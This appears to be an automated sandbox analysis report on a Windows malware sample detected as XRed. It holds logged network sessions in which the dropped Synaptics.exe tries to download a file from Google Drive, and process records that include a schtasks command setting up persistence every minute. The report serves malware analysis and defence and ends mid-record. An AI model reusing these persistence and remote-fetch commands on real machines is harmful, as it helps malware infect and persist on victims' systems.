Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49932	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:43 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:44 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4G03JCKDHc_xLTT3zs8DRgu2WavbFo1b_E9ZbBwdJln9QIyOXZCskgCPovuTaEQE-M Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:44 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-vc1FsO6pwRdNQmcnvZXjcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:44 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:44 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 58 7a 78 48 34 2d 54 65 70 30 4c 4f 42 4e 43 6a 45 76 49 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="OXzxH4-Tep0LOBNCjEvI5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:44 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	49979	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:54 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:54 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:54 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-x7XGNbOOYhsqC1QMVQm_Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	49980	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:54 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:54 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:54 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-1T9yC26MJC_YRtR2PPAC8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	49982	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:54 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:54 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7tACsKoHSmUnK9qsLTHzIVFAC4mZwKh67VYHSLu-8TBFbRHGLw2kRhsI8oTIGFgYoV Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:54 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-sWkMruUEWsu5r6upg0lomA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:54 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:54 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6e 39 75 68 66 72 74 72 36 54 58 62 5f 74 44 42 57 37 65 4a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="Zn9uhfrtr6TXb_tDBW7eJw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:54 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49984	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:54 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:54 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5hZy2zz7UywB6WmewDgtHePl-w2LXLfJPbGrKRjafGL1D0cwtXeZZVz5wOzeh49hZGzCz4sIg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:54 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-mOCILUZAmKX3c8pjizURcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:54 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:54 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 58 4b 43 2d 42 43 44 6e 6a 52 65 75 56 4f 43 54 63 4a 4a 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="ZXKC-BCDnjReuVOCTcJJLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:54 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Target ID:	0
Start time:	05:41:14
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\VKKDXE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VKKDXE.exe"
Imagebase:	0x400000
File size:	1'687'552 bytes
MD5 hash:	31BA582DDE7C48214DFC929A8C5D5662
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:41:15
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\._cache_VKKDXE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_VKKDXE.exe"
Imagebase:	0xd40000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2538907548.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	05:41:15
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	9DA1B61462418FA0389F2FAA306F6C1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:41:16
Start date:	30/12/2024
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x8b0000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	05:41:16
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:41:16
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:41:16
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs
Imagebase:	0x470000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2529358776.0000000002946000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2526904349.00000000026C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2526904349.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	05:41:17
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1
Imagebase:	0x480000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:41:19
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Imagebase:	0xdc0000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:41:26
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
Imagebase:	0xdc0000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:41:35
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	9DA1B61462418FA0389F2FAA306F6C1E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:18:05
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Imagebase:	0xdc0000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:18:12
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408
Imagebase:	0x790000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:18:12
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
Imagebase:	0xdc0000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:18:18
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408
Imagebase:	0x790000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:18:21
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
